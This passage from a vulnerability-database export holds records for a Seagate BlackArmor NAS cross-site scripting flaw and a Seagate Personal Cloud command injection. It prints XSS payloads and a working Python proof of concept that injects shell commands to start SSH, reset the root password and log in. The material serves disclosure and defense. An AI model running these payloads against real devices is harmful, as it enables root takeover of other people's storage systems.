# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site\nScripting Vulnerabilities\n \n# Google Dork: N/A\n \n# Date: 04-01-2014\n \n# Exploit Author: Jeroen - IT Nerdbox\n \n# Vendor Homepage:  \u003chttp://www.seagate.com/\u003e http://www.seagate.com/\n \n# Software Link:\n\u003chttp://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/\n\u003e\nhttp://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/\n \n# Version: sg2000-2000.1331\n \n# Tested on: N/A\n \n# CVE : CVE-2013-6923\n \n#\n \n## Description:\n \n#\n \n# When adding a user to the device, it is possible to enter a full name. \nThis input field does not\n \n# sanitize its input and it is possible to enter any payload which will get\nexecuted upon reload. The Work\nGroup name input\n# field does not sanitize its input. \n \n#\n# This vulnerability was reported to Seagate in September 2013, they stated\nthat this will not be fixed. \n \n#\n \n## Proof of Concept #1:\n \n#\n \n# POST: http(s)://\u003curl | ip\u003e/admin/access_control_user_edit.php?id=2\u0026lang=en\n# Parameters:\n \n#\n \n# index = 2\n# fullname = \u003cscript\u003ealert(1);\u003c/script\u003e\n# submit = Submit\n \n#\n \n#\n \n## Proof of Concept #2:\n \n#\n \n# POST: http(s)://\u003curl |\nip\u003e/admin/network_workgroup_domain.php?lang=en\u0026gi=n003\n \n# Parameter:\n \n#\n \n# workname = \"\u003e\u003cinput onmouseover=prompt(1) \u003e\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "db": "PACKETSTORM",
            "id": "124685"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-66925",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-6923",
            "trust": 3.5
          },
          {
            "db": "PACKETSTORM",
            "id": "124685",
            "trust": 2.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "30727",
            "trust": 2.3
          },
          {
            "db": "XF",
            "id": "90111",
            "trust": 1.4
          },
          {
            "db": "BID",
            "id": "64655",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094",
            "trust": 0.6
          },
          {
            "db": "XF",
            "id": "20136923",
            "trust": 0.6
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-84094",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "PACKETSTORM",
            "id": "124685"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "id": "VAR-201401-0161",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          }
        ],
        "trust": 1.54343433
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:24.323000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "BlackArmor NAS 220",
            "trust": 0.8,
            "url": "http://www.seagate.com/jp/ja/external-hard-drives/network-storage/business/blackarmor-nas-220/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://packetstormsecurity.com/files/124685"
          },
          {
            "trust": 1.7,
            "url": "http://www.exploit-db.com/exploits/30727"
          },
          {
            "trust": 1.4,
            "url": "http://xforce.iss.net/xforce/xfdb/90111"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90111"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6923"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6923"
          },
          {
            "trust": 0.6,
            "url": "http://www.exploit-db.com/exploits/30727/"
          },
          {
            "trust": 0.1,
            "url": "http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/"
          },
          {
            "trust": 0.1,
            "url": "http://www.seagate.com/\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6923"
          },
          {
            "trust": 0.1,
            "url": "http://www.seagate.com/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "PACKETSTORM",
            "id": "124685"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "PACKETSTORM",
            "id": "124685"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "date": "2014-01-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "BID",
            "id": "64655"
          },
          {
            "date": "2014-01-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "date": "2014-01-06T13:02:22",
            "db": "PACKETSTORM",
            "id": "124685"
          },
          {
            "date": "2014-01-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "date": "2014-01-09T18:55:08.150000",
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "date": "2017-08-29T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "date": "2015-03-19T09:05:00",
            "db": "BID",
            "id": "64655"
          },
          {
            "date": "2014-01-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "date": "2014-01-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS 220 Cross-site scripting vulnerability in device firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "xss",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "124685"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          }
        ],
        "trust": 0.7
      }
    }

    VAR-201801-1503

    Vulnerability from variot - Updated: 2024-11-23 22:52

    Seagate Media Server in Seagate Personal Cloud has unauthenticated command injection in the uploadTelemetry and getLogs functions in views.py because .psp URLs are handled by the fastcgi.server component and shell metacharacters are mishandled. Seagate Personal Cloud is a personal cloud storage device from Seagate, USA. Seagate Media Server is one of the media servers. An attacker could exploit this vulnerability to execute arbitrary commands with root privileges.

    Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.”

    Credit

    An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

    Vendor response

    Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory

    Vulnerabilities details

    Seagate Media Server uses Django web framework and is mapped to the .psp extension.

    Any URL that ends with .psp is automatically sent to the Seagate Media Server application using the FastCGI protocol. /etc/lighttpd/conf.d/django-host.conf:

    # Forwards every request whose URL ends in ".psp" or ".psp/" to the FastCGI
    # socket below; per the advisory that backend is the Seagate Media Server
    # Django application.
    # NOTE(review): nothing in this block restricts which clients may reach the
    # backend, so any access control has to be enforced by the views themselves.
    fastcgi.server += (
    ".psp"=>
       ((
          "socket" => "/var/run/manage_py-fastcgi.socket",
          # With check-local disabled, lighttpd does not require a matching file
          # under the document root before handing the request to the backend.
          "check-local" => "disable",
          "stream-post" => "enable",
          "allow-x-send-file" => "enable",
       )),
    # Same backend and options for the trailing-slash form of the extension.
    ".psp/"=>
       ((
          "socket" => "/var/run/manage_py-fastcgi.socket",
          "check-local" => "disable",
          "stream-post" => "enable",
          "allow-x-send-file" => "enable",
       ))
    )
    

    URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py.

    Two views were found to be affected by unauthenticated command injection.

    The affected views are:

    • uploadTelemetry
    • getLogs

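    These views take user input from GET parameters and pass it, unvalidated and unsanitized, to methods of the Python commands module. Those methods run the command string through a shell, which is why shell metacharacters in the parameters are interpreted rather than treated as data.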

    /usr/lib/django_host/seagate_media_server/views.py:

    # NOTE(review): csrf_exempt switches off Django's CSRF check for this view,
    # and no authentication check is visible anywhere in the function body.
    @csrf_exempt
    def uploadTelemetry(request):
       """Run the log_telemetry helper with the TimeStamp GET parameter.

       Vulnerable listing quoted from the advisory: the request parameter is
       concatenated into a shell command line without validation.
       """
       # Attacker-controlled: read directly from the query string.
       ts = request.GET.get('TimeStamp','')
       if (checkDBSQLite()) :
          # NOTE(review): this failure message is assigned but never returned;
          # control falls through to the final '{"stat":"ok"}' response.
          response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
       else :
          if ts == "":
             response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
             return HttpResponse(response);
          # Injection sink: ts is appended to the command string and
          # commands.getoutput() executes that string through a shell.
          # A fix would validate ts against a strict pattern (e.g. digits only,
          # if that is what the helper expects) and invoke the helper with an
          # argument list via subprocess so that no shell is involved.
          cmd = "/usr/local/bin/log_telemetry "+str(ts)
          commands.getoutput(cmd)
       return HttpResponse('{"stat":"ok"}')
    

    /usr/lib/django_host/seagate_media_server/views.py:

    # NOTE(review): csrf_exempt switches off Django's CSRF check for this view,
    # and no authentication check is visible anywhere in the function body.
    @csrf_exempt
    def getLogs (request):
       """Start a log archive job, or report the status of an existing one.

       With an arch_id parameter the view runs the helper script in 'status'
       mode; without one it runs it in 'start' mode with time_stamp.
       Vulnerable listing quoted from the advisory: both parameters are
       concatenated into a shell command line without validation.
       """
       try:
          cmd_base='/usr/bin/log-extract-manager.sh'
          # Both values are attacker-controlled query-string parameters.
          uID = request.GET.get ( 'arch_id', None )
          time_stamp = request.GET.get ( 'time_stamp', '' )
    
          if uID:
             # Injection sink: uID is appended to the command string and
             # commands.getstatusoutput() executes that string through a shell.
             (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
             if ('In progress' in output) and (uID in output) :
                return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
             elif (status == 0) :
                # The helper's output is used as a filesystem path for getsize().
                return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
             else :
                return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
          else:
             # Injection sink: same pattern with time_stamp. A fix would validate
             # both parameters against strict patterns and invoke the script with
             # an argument list via subprocess so that no shell is involved.
             (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
             if (status == 0) :
                # NOTE(review): output is interpolated into the JSON text unescaped.
                return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
    
          return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
       # Bare except: every error is reported as the same generic failure, so
       # malformed requests leave no distinguishing trace in the response.
       except :
          return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
    

    Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.

    Proof of Concept

    The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.

    #!/usr/bin/env python
    # Proof of concept from the advisory for the uploadTelemetry/getLogs command
    # injection (Python 2 syntax). Reviewer notes for defenders:
    #  - the requests it sends are GETs to uploadTelemetry.psp (or getLogs.psp)
    #    whose TimeStamp / time_stamp value begins with an encoded ';' (%3b);
    #    web-server access logs are the place to look for that pattern.
    #  - on success the device ends up with sshd running and a changed root
    #    password, so an unexpected SSH listener (port 2222 here) or a root
    #    password change are the host-side signs of compromise.
    import os
    import urllib
    
    # Target endpoint; the commented-out pair selects the getLogs view instead.
    scheme = 'http'
    host = 'personalcloud.local'
    port = '80'
    path = 'uploadTelemetry.psp'
    querystr = 'TimeStamp=%3b'
    #path = 'getLogs.psp'
    #querystr = 'time_stamp=%3b'
    # Hard-coded sample password that the PoC sets for root.
    password = 'Welcome01'
    
    # Commands the PoC asks the device to run: start sshd, then set the password.
    cmds = ['ngc --start sshd 2>&1',
          'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
    
    # One unauthenticated GET request per command; the response body is printed.
    for cmd in cmds:
       print 'Running command', repr(cmd)
       cmd = urllib.quote_plus(cmd)
       r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
       print r.read()
    
    print 'Log in with', password
    os.system('ssh -p 2222 root@%s' % host)
    


    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "personal cloud",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": null
          },
          {
            "_id": null,
            "model": "personal cloud",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "_id": null,
            "model": "technology personal cloud",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5347"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:personal_cloud_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Yorick Koster",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "145932"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2018-5347",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-5347",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-04347",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-135378",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-5347",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-5347",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-5347",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-04347",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201801-562",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-135378",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2018-5347",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135378"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5347"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Seagate Media Server in Seagate Personal Cloud has unauthenticated command injection in the uploadTelemetry and getLogs functions in views.py because .psp URLs are handled by the fastcgi.server component and shell metacharacters are mishandled. SeagatePersonalCloud is a personal cloud storage device from Seagate, USA. SeagateMediaServer is one of the media servers. An attacker could exploit this vulnerability to execute arbitrary commands with root privileges. \n \nSeagate Personal Cloud Home Media Storage is athe easiest way to store, organize, stream and share all your music, movies, photos, and important documents.a\n \n## Credit\nAn independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program\n \n## Vendor response\nSeagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory\n \n## Vulnerabilities details\nSeagate Media Server uses Django web framework and is mapped to the .psp extension. \n \nAny URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol. \n/etc/lighttpd/conf.d/django-host.conf:\n \n \n```\nfastcgi.server += (\n\".psp\"=\u003e\n   ((\n      \"socket\" =\u003e \"/var/run/manage_py-fastcgi.socket\",\n      \"check-local\" =\u003e \"disable\",\n      \"stream-post\" =\u003e \"enable\",\n      \"allow-x-send-file\" =\u003e \"enable\",\n   )),\n\".psp/\"=\u003e\n   ((\n      \"socket\" =\u003e \"/var/run/manage_py-fastcgi.socket\",\n      \"check-local\" =\u003e \"disable\",\n      \"stream-post\" =\u003e \"enable\",\n      \"allow-x-send-file\" =\u003e \"enable\",\n   ))\n)\n```\n \n \nURLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. 
\n \nTwo views were found to be affected by unauthenticated command injection. \n \nThe affected views are:\n \n- uploadTelemetry\n- getLogs\n \nThese views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module. \n \n/usr/lib/django_host/seagate_media_server/views.py:\n \n \n```\n@csrf_exempt\ndef uploadTelemetry(request):\n   ts = request.GET.get(\u0027TimeStamp\u0027,\u0027\u0027)\n   if (checkDBSQLite()) :\n      response = \u0027{\"stat\":\"failed\",\"code\":\"80\",\"message\":\"The Database has not been initialized or mounted yet!\"}\u0027\n   else :\n      if ts == \"\":\n         response = \u0027{\"stat\":\"failed\",\"code\":\"380\",\"message\":\"TimeStamp parameter missing\"}\u0027\n         return HttpResponse(response);\n      cmd = \"/usr/local/bin/log_telemetry \"+str(ts)\n      commands.getoutput(cmd)\n   return HttpResponse(\u0027{\"stat\":\"ok\"}\u0027)\n```\n \n \n/usr/lib/django_host/seagate_media_server/views.py:\n \n \n```\n@csrf_exempt\ndef getLogs (request):\n   try:\n      cmd_base=\u0027/usr/bin/log-extract-manager.sh\u0027\n      uID = request.GET.get ( \u0027arch_id\u0027, None )\n      time_stamp = request.GET.get ( \u0027time_stamp\u0027, \u0027\u0027 )\n    \n      if uID:\n         (status, output) = commands.getstatusoutput(cmd_base + \u0027 status \u0027 + uID);\n         if (\u0027In progress\u0027 in output) and (uID in output) :\n            return HttpResponse (\u0027{\"stat\":\"ok\", \"data\": {\"status\":\"In Progress\"}}\u0027)\n         elif (status == 0) :\n            return HttpResponse (\u0027{\"stat\":\"ok\", \"data\": {\"url\":\"%s\", \"fileSize\":\"%d\"}}\u0027 % ( urllib.quote(output.encode(\u0027utf-8\u0027)), os.path.getsize(output) ))\n         else :\n            return HttpResponse (\u0027{\"stat\":\"failed\", \"code\":\"853\",\"message\":\"Id not recognized.\"}\u0027 )\n      else:\n         (status, output) = commands.getstatusoutput(cmd_base + 
\u0027 start \u0027 + time_stamp);\n         if (status == 0) :\n            return HttpResponse (\u0027{\"stat\":\"ok\", \"data\": {\"archiveID\":\"%s\"}}\u0027 % (output))\n    \n      return HttpResponse (\u0027{\"stat\":\"failed\", \"code\":\"852\",\"message\":\"Zip file not created.\"}\u0027 )\n   except :\n      return HttpResponse (\u0027{\"stat\":\"failed\", \"code\":\"852\",\"message\":\"Zip file not created.\"}\u0027 )\n```\n \n \nNote that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery. \n \n### Proof of Concept\nThe following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password. \n \n \n```\n#!/usr/bin/env python\nimport os\nimport urllib\n    \nscheme = \u0027http\u0027\nhost = \u0027personalcloud.local\u0027\nport = \u002780\u0027\npath = \u0027uploadTelemetry.psp\u0027\nquerystr = \u0027TimeStamp=%3b\u0027\n#path = \u0027getLogs.psp\u0027\n#querystr = \u0027time_stamp=%3b\u0027\npassword = \u0027Welcome01\u0027\n    \ncmds = [\u0027ngc --start sshd 2\u003e\u00261\u0027,\n      \u0027echo -e \"%(s)s\\n%(s)s\"|passwd 2\u003e\u00261\u0027 % {\u0027s\u0027 : password}]\n    \nfor cmd in cmds:\n   print \u0027Running command\u0027, repr(cmd)\n   cmd = urllib.quote_plus(cmd)\n   r = urllib.urlopen(\u0027%s://%s:%s/%s?%s%s\u0027 % (scheme, host, port, path, querystr, cmd))\n   print r.read()\n    \nprint \u0027Log in with\u0027, password\nos.system(\u0027ssh -p 2222 root@%s\u0027 % host)\n```\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-5347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135378"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347"
          },
          {
            "db": "PACKETSTORM",
            "id": "145932"
          }
        ],
        "trust": 2.43
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-135378",
            "trust": 0.1,
            "type": "unknown"
          },
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43659",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-135378"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-5347",
            "trust": 3.3
          },
          {
            "db": "EXPLOIT-DB",
            "id": "43659",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "145932",
            "trust": 0.2
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-97283",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-135378",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135378"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5347"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-001653"
          },
          {
            "db": "PACKETSTORM",
            "id": "145932"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201801-562"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5347"
          }
        ]
      },
      "id": "VAR-201801-1503",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-04347"
          },
          {
